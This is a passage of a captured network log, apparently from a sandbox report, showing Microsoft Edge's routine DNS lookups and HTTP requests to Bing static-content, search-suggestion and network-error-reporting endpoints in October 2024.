Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 328
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: RyGzYQ1bPsIUh6P5T7D2GQ==
Last-Modified: Tue, 24 Sep 2024 05:54:26 GMT
ETag: 0x8DCDC5D58D85446
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ca276643-801e-006d-6200-1540be000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=184546
Expires: Mon, 07 Oct 2024 19:21:36 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a2879
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/sa/simg/Roboto_Regular.woff2

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /sa/simg/Roboto_Regular.woff2 HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Referer: https://r.bing.com/rs/5W/2VH/cir3,cc,nc/1KKUBDl-P5UnnMr4CFdIc4245kE.css?or=w
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 404 Not Found

Accept-Ranges: bytes
Content-Length: 10
Server: AkamaiNetStorage
Date: Sat, 05 Oct 2024 16:07:41 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144461.f0a292a
DNS

162.128.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

162.128.123.92.in-addr.arpa

IN PTR

Response

162.128.123.92.in-addr.arpa

IN PTR

a92-123-128-162deploystaticakamaitechnologiescom
DNS

162.128.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

162.128.123.92.in-addr.arpa

IN PTR
DNS

164.128.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

164.128.123.92.in-addr.arpa

IN PTR

Response

164.128.123.92.in-addr.arpa

IN PTR

a92-123-128-164deploystaticakamaitechnologiescom
DNS

164.128.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

164.128.123.92.in-addr.arpa

IN PTR
DNS

s.bingparachute.com

msedge.exe

Remote address:

8.8.8.8:53

Request

s.bingparachute.com

IN A

Response

s.bingparachute.com

IN CNAME

s.bingparachute.com.edgekey.net

s.bingparachute.com.edgekey.net

IN CNAME

e14705.g.akamaiedge.net

e14705.g.akamaiedge.net

IN A

23.204.237.191
DNS

s.bingparachute.com

msedge.exe

Remote address:

8.8.8.8:53

Request

s.bingparachute.com

IN A

Response

s.bingparachute.com

IN CNAME

s.bingparachute.com.edgekey.net

s.bingparachute.com.edgekey.net

IN CNAME

e14705.g.akamaiedge.net

e14705.g.akamaiedge.net

IN A

23.204.237.191
GET

https://s.bingparachute.com/search?q=porn%20viruses&mkt=nl-nl&muid=05879ADD3EF86D540F588FD23FDB6C78&impressionguid=0DD30F05AB304142B388EAD39E0E9879&traceid=670163c530fd47b881461133ee19e33f&refid=Ref%20A%3A%20670163c530fd47b881461133ee19e33f%20Ref%20B%3A%20DUBEEAP0000E10D%20Ref%20C%3A%202024-10-05T16%3A05%3A25Z

msedge.exe

Remote address:

23.204.237.191:443

Request

GET /search?q=porn%20viruses&mkt=nl-nl&muid=05879ADD3EF86D540F588FD23FDB6C78&impressionguid=0DD30F05AB304142B388EAD39E0E9879&traceid=670163c530fd47b881461133ee19e33f&refid=Ref%20A%3A%20670163c530fd47b881461133ee19e33f%20Ref%20B%3A%20DUBEEAP0000E10D%20Ref%20C%3A%202024-10-05T16%3A05%3A25Z HTTP/1.1
Host: s.bingparachute.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 404 Not Found

Accept-Ranges: bytes
Content-Length: 10
Server: AkamaiNetStorage
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Access-Control-Max-Age: 86400
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET,POST
Access-Control-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingparachute"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
DNS

aefd.nelreports.net

msedge.exe

Remote address:

8.8.8.8:53

Request

aefd.nelreports.net

IN A

Response

aefd.nelreports.net

IN CNAME

aefd.nelreports.net.akamaized.net

aefd.nelreports.net.akamaized.net

IN CNAME

a1851.dscg2.akamai.net

a1851.dscg2.akamai.net

IN A

2.19.117.148

a1851.dscg2.akamai.net

IN A

2.19.117.143
DNS

aefd.nelreports.net

msedge.exe

Remote address:

8.8.8.8:53

Request

aefd.nelreports.net

IN A

Response

aefd.nelreports.net

IN CNAME

aefd.nelreports.net.akamaized.net

aefd.nelreports.net.akamaized.net

IN CNAME

a1851.dscg2.akamai.net

a1851.dscg2.akamai.net

IN A

2.19.117.148

a1851.dscg2.akamai.net

IN A

2.19.117.143
OPTIONS

https://aefd.nelreports.net/api/report?cat=bingaotak

msedge.exe

Remote address:

2.19.117.148:443

Request

OPTIONS /api/report?cat=bingaotak HTTP/1.1
Host: aefd.nelreports.net
Connection: keep-alive
Origin: https://r.bing.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 0
Server: Kestrel
Date: Sat, 05 Oct 2024 16:05:30 GMT
Alt-Svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
Connection: keep-alive
PMUSER_FORMAT_QS:
X-CDN-TraceId: 0.94741302.1728144330.11d4817c
Access-Control-Allow-Headers: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Methods: GET, OPTIONS, POST
Access-Control-Allow-Origin: *
OPTIONS

https://aefd.nelreports.net/api/report?cat=bingaotak

msedge.exe

Remote address:

2.19.117.148:443

Request

OPTIONS /api/report?cat=bingaotak HTTP/1.1
Host: aefd.nelreports.net
Connection: keep-alive
Origin: https://r.bing.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 0
Server: Kestrel
Date: Sat, 05 Oct 2024 16:06:30 GMT
Connection: keep-alive
PMUSER_FORMAT_QS:
X-CDN-TraceId: 0.94741302.1728144390.11d481d5
Access-Control-Allow-Headers: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Methods: GET, OPTIONS, POST
Access-Control-Allow-Origin: *
OPTIONS

https://aefd.nelreports.net/api/report?cat=bingparachute

msedge.exe

Remote address:

2.19.117.148:443

Request

OPTIONS /api/report?cat=bingparachute HTTP/1.1
Host: aefd.nelreports.net
Connection: keep-alive
Origin: https://s.bingparachute.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 0
Server: Kestrel
Date: Sat, 05 Oct 2024 16:06:30 GMT
Connection: keep-alive
PMUSER_FORMAT_QS:
X-CDN-TraceId: 0.94741302.1728144390.11d83046
Access-Control-Allow-Headers: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Methods: GET, OPTIONS, POST
Access-Control-Allow-Origin: *
OPTIONS

https://aefd.nelreports.net/api/report?cat=bingparachute

msedge.exe

Remote address:

2.19.117.148:443

Request

OPTIONS /api/report?cat=bingparachute HTTP/1.1
Host: aefd.nelreports.net
Connection: keep-alive
Origin: https://s.bingparachute.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 0
Server: Kestrel
Date: Sat, 05 Oct 2024 16:07:30 GMT
Connection: keep-alive
PMUSER_FORMAT_QS:
X-CDN-TraceId: 0.94741302.1728144450.11d834b5
Access-Control-Allow-Headers: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Methods: GET, OPTIONS, POST
Access-Control-Allow-Origin: *
OPTIONS

https://aefd.nelreports.net/api/report?cat=bingaotak

msedge.exe

Remote address:

2.19.117.148:443

Request

OPTIONS /api/report?cat=bingaotak HTTP/1.1
Host: aefd.nelreports.net
Connection: keep-alive
Origin: https://r.bing.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 0
Server: Kestrel
Date: Sat, 05 Oct 2024 16:08:30 GMT
Connection: keep-alive
PMUSER_FORMAT_QS:
X-CDN-TraceId: 0.94741302.1728144510.11dbdeec
Access-Control-Allow-Headers: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Methods: GET, OPTIONS, POST
Access-Control-Allow-Origin: *
OPTIONS

https://aefd.nelreports.net/api/report?cat=bingparachute

msedge.exe

Remote address:

2.19.117.148:443

Request

OPTIONS /api/report?cat=bingparachute HTTP/1.1
Host: aefd.nelreports.net
Connection: keep-alive
Origin: https://s.bingparachute.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 0
Server: Kestrel
Date: Sat, 05 Oct 2024 16:09:30 GMT
Connection: keep-alive
PMUSER_FORMAT_QS:
X-CDN-TraceId: 0.94741302.1728144570.11dfce45
Access-Control-Allow-Headers: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Methods: GET, OPTIONS, POST
Access-Control-Allow-Origin: *
OPTIONS

https://aefd.nelreports.net/api/report?cat=bingaotak

msedge.exe

Remote address:

2.19.117.148:443

Request

OPTIONS /api/report?cat=bingaotak HTTP/1.1
Host: aefd.nelreports.net
Connection: keep-alive
Origin: https://r.bing.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 0
Server: Kestrel
Date: Sat, 05 Oct 2024 16:12:38 GMT
Connection: keep-alive
PMUSER_FORMAT_QS:
X-CDN-TraceId: 0.94741302.1728144750.11e3b442
Access-Control-Allow-Headers: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Methods: GET, OPTIONS, POST
Access-Control-Allow-Origin: *
OPTIONS

https://aefd.nelreports.net/api/report?cat=bingparachute

msedge.exe

Remote address:

2.19.117.148:443

Request

OPTIONS /api/report?cat=bingparachute HTTP/1.1
Host: aefd.nelreports.net
Connection: keep-alive
Origin: https://s.bingparachute.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 500 Internal Server Error

Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 387
Expires: Sat, 05 Oct 2024 16:13:43 GMT
Date: Sat, 05 Oct 2024 16:13:43 GMT
Connection: keep-alive
PMUSER_FORMAT_QS:
X-CDN-TraceId: 0.94741302.1728144813.11f04bbe
Access-Control-Allow-Headers: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Methods: GET, OPTIONS, POST
Access-Control-Allow-Origin: *
GET

https://r.bing.com/rp/NW_w0EXs3h3l9N3PeqyVuRIrqp8.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/NW_w0EXs3h3l9N3PeqyVuRIrqp8.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 541
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: NEMR8KpUsOFkLfYMbaoAQw==
Last-Modified: Tue, 24 Sep 2024 06:17:01 GMT
ETag: 0x8DCDC60808668AA
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3dd20b7a-601e-0023-07a0-14855b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=143458
Expires: Mon, 07 Oct 2024 07:56:28 GMT
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9e777b5c.1728144330.192d05fd
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/TFi00n9kt1lqPoE9f5YVPavsHbE.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/TFi00n9kt1lqPoE9f5YVPavsHbE.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 175
Content-Type: application/x-javascript; charset=utf-8
Content-Encoding: br
Content-MD5: 6EH+w8FwrQtefaxEd1LgMQ==
Last-Modified: Wed, 24 Jun 2020 05:08:06 GMT
ETag: 0x8D817FC9488E75D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6431d5c6-c01e-0041-4670-145c48000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=122938
Expires: Mon, 07 Oct 2024 02:14:29 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9e777b5c.1728144331.192d060e
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/2B9u0snswl6MSm6KlelCMIZAr0E.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/2B9u0snswl6MSm6KlelCMIZAr0E.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1209
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: D51WbBCmUCTaPMMHZOdm7w==
Last-Modified: Thu, 04 Jan 2024 08:45:40 GMT
ETag: 0x8DC0D0187BE0A34
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8e02ecc0-101e-00c4-0af3-087195000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=99197
Expires: Sun, 06 Oct 2024 19:38:48 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9e777b5c.1728144331.192d0732
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Yp5uRx1ZvJMBOj_5nU0FUN0279s.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/Yp5uRx1ZvJMBOj_5nU0FUN0279s.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1103
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: /jlcyij4R609bRURPIuReQ==
Last-Modified: Tue, 24 Sep 2024 06:34:56 GMT
ETag: 0x8DCDC630183D39E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8bbcecc8-601e-0067-469c-165937000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=361534
Expires: Wed, 09 Oct 2024 20:31:05 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9e777b5c.1728144331.192d07cb
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/xvEz2IbMlyghPZ3oNAHr9N-xMOA.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/xvEz2IbMlyghPZ3oNAHr9N-xMOA.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Content-MD5: E6VRkNYBWPjLg+NxAtCPwQ==
Last-Modified: Sat, 20 Jul 2024 02:59:45 GMT
ETag: 0x8DCA868026E5F1B
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7ac9f34e-201e-0014-33e6-e94cc3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 2471
Cache-Control: public, no-transform, max-age=98091
Expires: Sun, 06 Oct 2024 19:20:22 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9e777b5c.1728144331.192d08bf
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/j7QTvC_hnIspQX0jVufvDFJYNV0.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/j7QTvC_hnIspQX0jVufvDFJYNV0.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 158
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: Tvjjh0NsRYK9Q1w+qIJQug==
Last-Modified: Tue, 24 Sep 2024 06:51:45 GMT
ETag: 0x8DCDC655B16695E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7dbf8510-101e-000e-346a-15069b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=230270
Expires: Tue, 08 Oct 2024 08:03:21 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9e777b5c.1728144331.192d0a4e
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/V_fBQ_iVmAgE_Ta_T-6BNXc0ZY4.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/V_fBQ_iVmAgE_Ta_T-6BNXc0ZY4.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 368
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: xl2SFLZCQEcsZUNAUSfMmA==
Last-Modified: Tue, 24 Sep 2024 06:29:34 GMT
ETag: 0x8DCDC6241BA29EA
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 33337a6b-901e-0014-64b0-1429f4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=150340
Expires: Mon, 07 Oct 2024 09:51:12 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9e777b5c.1728144332.192d0b5e
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/psgXZvzYJMEW2ydikIk493Va1d4.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/psgXZvzYJMEW2ydikIk493Va1d4.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 635
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: cbryIH17LuJqgju0sWrerw==
Last-Modified: Tue, 24 Sep 2024 07:02:01 GMT
ETag: 0x8DCDC66CA2704F8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9c1a67be-101e-002c-19ab-1668ad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=368226
Expires: Wed, 09 Oct 2024 22:22:38 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9e777b5c.1728144332.192d0c17
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/GSNeCa5XvtoP6jz0k5V172vRaQ8.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/GSNeCa5XvtoP6jz0k5V172vRaQ8.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
